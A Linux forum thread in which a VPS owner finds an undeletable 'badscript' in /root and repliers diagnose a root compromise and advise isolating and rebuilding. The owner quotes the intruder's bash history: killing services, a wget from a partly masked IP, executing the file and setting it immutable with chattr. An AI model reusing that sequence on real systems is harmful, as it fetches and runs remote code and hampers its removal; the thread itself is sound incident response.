Cant delete or chown file as a root

postcd · 07-30-2014, 09:38 AM

Hello,

some hack script suddenly appear in the /root directory of my VPS. Lets call it "badscript"

Quote:

-rwxr-xr-x 1 root root 1.2M Jul 18 12:34 badscript

but i cant delete it or chown it being root..

it says:

Quote:

rm: cannot remove `badscript': Operation not permitted
chown: changing ownership of `badscript': Operation not permitted

stat badscript

Quote:

File: `badscript'
Size: 1189151 Blocks: 2336 IO Block: 4096 regular file
Device: 57h/87d Inode: 17932822 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2014-07-29 16:51:30.000000000 -0400
Modify: 2014-07-18 12:34:49.000000000 -0400
Change: 2014-07-29 16:51:25.000000000 -0400

Please any idea how to block that person who added this script to my linux redhat server?

"last" command shows only my regular ips, no stranger ip

and how to remove that script? Thank you

Ser Olmy · 07-30-2014, 09:41 AM

Try clearing the immutable bit with chattr -i badscript.

Oh, and if someone can write files to the /root directory of your server, you have bigger problems than a stubborn script file. Someone has managed to get root access to this server.

szboardstretcher · 07-30-2014, 09:46 AM

Ser Olmy is correct on both counts.

First thing to do is remove the computer from the network. Then there are plenty of guides to get you through the cleanup if you DO NOT have a good backup.

also remember that stat/lsattr/getfacl are your friends for permissions issues.

postcd · 07-30-2014, 02:22 PM

thx, when i run lsattrm it shows:

Quote:

----i---------- ./badscript

groups

Quote:

root

cat /etc/passwd | grep root

Quote:

root:x:0:0:root:/root:/bin/bash
operator:x:11:0

perator:/root:/sbin/nologin

Also thanks to command:
find /root -type f -name "*" -mtime -48

i found some modiffied files, amongs them:

Quote:

/root/sent
/root/badscript
/root/conf.n
/root/.mysql_history
/root/.bash_history

cat /root/.bash_history

Quote:

uname -a
passwd
ps -
killall -9 httpd
killall -9 pickup
killall -9 qmgr
killall -9 proftpd
killall -9 xinetd
wget http://192.161.*.*:1688/badscript
chmod +x badscript
./badscript
chattr +i badscript
killall -9 sshpa

(i replaced ip by asterisks)

cat /root/.mysql_history

Quote:

password
show databases;

please any ideas? I already changed root password, and its not guessable one (previous was too not guessable not dictionary)..

unSpawn · 07-31-2014, 02:54 PM

Quote:

Originally Posted by postcd

please any ideas?

Changing the root password isn't going to change the fact this was a root compromise. If this was a production machine then alert any users (have them check their machines as well), mark backups "tainted" and not to be used, isolate all network access to your management IP (range) and investigate with the intent to learn from it, set up a new machine and follow proper procedure (that is, not with the intent to try and "fix" this "victim" machine).

*As an aside I always though you asked too much questions in too little time and without properly discussing replies and options, but maybe that's just me.

jefro · 07-31-2014, 08:12 PM

Boot to live media/single user mode and check filesystem. It should not be an issue to remove from live media.

As above notes also to include issues about current security state. May need to run security sweeps or consider reload OS in worse case.

Usually when we see this "linux redhat server" we suggest you contact your RH support staff.

unSpawn · 08-01-2014, 12:28 AM

Quote:

Originally Posted by jefro

As above notes also to include issues about current security state. May need to run security sweeps or consider reload OS in worse case.

Please be clear. What do you mean "worse case"? This is a root compromise!

Quote:

Originally Posted by jefro

Usually when we see this "linux redhat server" we suggest you contact your RH support staff.

Your "we" includes a subset of LQ members which does not include me.
In this case it is neither needed or warranted to contact Red Hat Support.

mboelen · 08-04-2014, 01:24 PM

Clearly a root compromise. Time to install a new VPS, tighten it up and carefully restore data.